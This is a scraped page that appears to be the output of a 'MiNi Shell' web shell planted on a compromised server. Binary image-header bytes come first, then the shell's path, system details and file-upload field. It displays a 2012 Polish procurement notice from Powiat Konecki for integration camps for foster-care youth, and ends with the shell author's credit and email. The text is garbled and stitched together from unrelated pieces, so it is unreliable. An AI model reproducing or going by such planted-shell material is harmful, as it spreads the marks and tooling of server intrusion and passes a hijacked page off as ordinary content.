JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120323/67735-N-2012.html

<p class="kh_header"><b>Końskie: Część I Zorganizowanie 10 dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych (8 h warsztatów) dla 10 wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych w wieku 15-18 lat Część II Zorganizowanie 10 - dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych (8 h warsztatów) dla 15 usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18-25 lat.</b><br>
<b>Numer ogłoszenia: 67735 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część I Zorganizowanie 10 dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych (8 h warsztatów) dla 10 wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych w wieku 15-18 lat Część II Zorganizowanie 10 - dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych (8 h warsztatów) dla 15 usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18-25 lat..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na:

Część I
Zorganizowaniu 10 - dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych (8 h warsztatów) dla 10 wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15-18 lat
Część II
Zorganizowaniu 10 - dniowego Obozu Aktywnej Integracji połączonego z grupowymi warsztatami z zakresu podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych (8 h warsztatów) dla 15 usamodzielnianych wychowanków rodzin zastępczych                       i placówek opiekuńczo - wychowawczych w wieku 18-25 lat

2. Wymagany termin realizacji przedmiotu zamówienia: 
Część I - w terminie wybranym przez Wykonawcę od 01.07.2012 r. do 31.08.2012 r.
Część II - w terminie wybranym przez Wykonawcę od 01.07.2012 r. do 31.08.2012 r.
3. Wymagania kadrowe: 
a) dotyczące Części I i Część II zamówienia:
w zakresie organizacji obozu:
 - kierownik  posiadający kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.),
- 2 opiekunów, wychowawców posiadających kwalifikacje określone                                               w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku                      w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci                     i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.),
w zakresie organizacji warsztatów z zakresu podniesienia kompetencji życiowych                     i umiejętności społeczno - zawodowych: 1 trener o wykształceniu wyższym (psycholog,pedagog,socjolog) posiadający doświadczenie w przeprowadzeniu                            2 treningów/warsztatów/szkoleń z zakresu aktywizacji  zawodowej, 
w zakresie opieki medycznej - 1 pielęgniarka,
5 . Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
Dotyczy  Części I i II:
a)	Wykonawca zorganizuje Obozy w atrakcyjnej miejscowości turystycznej na terytorium Polski,
b)	Wykonawca zapewni transport uczestników na obozy z Końskich do ośrodka                                              i w drodze powrotnej -  autokarem, busem wyposażonym w klimatyzację, wc. Zamawiający zastrzega sobie prawo do kontroli pojazdu przed rozpoczęciem podróży, przez odpowiednie służby kontroli. W razie wykazania przez organy kontroli niesprawności autokaru, busa, Wykonawca jest zobowiązany w ciągu godziny do podstawienia pojazdu sprawnego/zastępczego. Transport uczestników obozów powinien odbywać się w ciągu dnia,
c)	Wykonawca zapewni uczestnikom obozów całodobową opiekę pielęgniarską oraz  wyżywienie 4 razy dziennie (śniadanie w formie szwedzkiego stołu, obiad, podwieczorek i kolacja w formie szwedzkiego stołu), jak również suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania obozu (soki, kanapki, owoce, słodycze). Jadalnia (stołówka) powinna być usytuowana na terenie obiektu, w którym zorganizowany jest obóz, o powierzchni umożliwiającej jednoczesne spożywanie posiłku przez wszystkich uczestników obozu,
d)	Uczestnicy obozów będą zakwaterowani w pokojach dwu- lub trzyosobowych,                         o podwyższonym standardzie, z pełnym węzłem sanitarnym, z TV kablową                       i czajnikiem bezprzewodowym. Wykluczone jest zakwaterowanie uczestników obozu w domkach kempingowych,
e)	Czas trwania warsztatów z zakresu podniesienia kompetencji życiowych i umiejętności społeczno - zawodowych - 8 godzin zegarowych dla każdego uczestnika obozu,
f)	Miejsce prowadzenia warsztatów - na terenie ośrodka, w którym będzie się odbywał obóz. Sala przeznaczona do prowadzenia warsztatów powinna być wyposażona  minimum w klimatyzację, dzienne oświetlenie, flipchart i sprzęt multimedialny (laptop i rzutnik multimedialny),
g)	Wykonawca zapewni uczestnikom obozów zajęcia integracyjne o charakterze kulturalno-rozrywkowym (wycieczkę autokarową z przewodnikiem, dyskoteki, ognisko, rozgrywki sportowe z nagrodami itp.). W przypadku organizacji wycieczki - Wykonawca zapewni nieodpłatny dla uczestników wstęp do zwiedzania obiektów,
h)	Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczestników obozów, od momentu wyjazdu do czasu odbioru wszystkich osób z miejsca zbiórki po powrocie przez rodziców lub opiekunów prawnych,
i)	Wykonawca zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy                    w trakcie obozów i warsztatów,
j)	Wykonawca przeprowadzi podczas Obozów ewaluację realizacji zadania za pomocą ankiet, zgodnie z przekazanym przez Zamawiającego wzorem,
k)	W przypadku zorganizowania obozów w miejscowości uzdrowiskowej - Wykonawca poniesie koszty opłaty uzdrowiskowej/klimatycznej za wszystkich uczestników obozów,
l)	Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika obozu, obejmujące: dojazd uczestników obozu z miejscowości Końskie do miejsca odbywania się obozu, dojazd z miejsca odbywania się obozu do miejscowości Końskie uczestników obozu oraz całodobowy 10 dniowy pobyt na obozie, na kwotę minimum 10.000 zł. na jedną osobę,
m)	Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy obozu poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego),
n)	Wykonawca będzie prowadził dokumentację przebiegu obozów, warsztatów, tj.: dziennik zajęć, listy obecności oraz sporządzi dokumentację fotograficzną, którą przekaże Zamawiającemu na płycie CD, DVD po zakończeniu Obozów,
o)	Wykonawca po zakończonych warsztatach wyda jego uczestnikom stosowne certyfikaty, których kserokopie wraz z imienną listą, przekaże Zamawiającemu,
p)	Zamawiający zastrzega sobie prawo kontroli w zakresie realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do  prowadzenia działalności w oparciu o ustawę z dnia 29 sierpnia 1997 r.                           o usługach turystycznych (Dz. U. z 2004 r. Nr 223 poz. 2268 z późn. zm.) tj. jest wpisany do rejestru organizatorów turystyki i pośredników turystycznych, prowadzonego przez marszałka województwa właściwego ze względu na siedzibę Wykonawcy (przedsiębiorcy),                                        a w przypadku Wykonawców (przedsiębiorców) zagranicznych w rozumieniu powyższej ustawy - wybranego przez niego marszałka województwa, z zastrzeżeniem, iż w przypadku Wykonawcy (przedsiębiorcy) zagranicznego, który utworzył oddział na terytorium Rzeczypospolitej Polskiej zgodnie z przepisami ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej organem właściwym do prowadzenia rejestru jest marszałek województwa właściwy ze względu na siedzibę oddziału.
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej dwie usługi, z których każda polegała na zorganizowaniu i przeprowadzeniu kolonii lub obozu dla minimum 10 uczestników (dzieci i/lub młodzieży).
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami: 
w zakresie organizacji obozów:
 - kierownik  posiadający kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania                 i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.),
-  2 opiekunów/wychowawców posiadających kwalifikacje określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r., Nr 12, poz. 67 z późn. zm.),
w zakresie organizacji warsztatów z zakresu podniesienia kompetencji życiowych                                i umiejętności społeczno - zawodowych - 1 trener o wykształceniu wyższym (psycholog/pedagog/socjolog) posiadający doświadczenie w przeprowadzeniu                                          2 treningów/warsztatów/szkoleń o tematyce z zakresu aktywizacji  zawodowej, 
w zakresie opieki medycznej - 1 pielęgniarka.
Zamawiający dokona oceny spełniania przez Wykonawcę warunków udziału w postępowaniu na zasadzie spełnia/nie spełnia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
-terminów realizacji zamówienia - w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),
-osób, które będą uczestniczyć w wykonywaniu zamówienia (wskazanych w ofercie Wykonawcy), pod warunkami określonymi w § 4 ust. 2 wzoru umowy,
-wysokości wynagrodzenia Wykonawcy za realizację przedmiotu umowy - w przypadkach określonych w § 5 ust. 5 wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie  aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com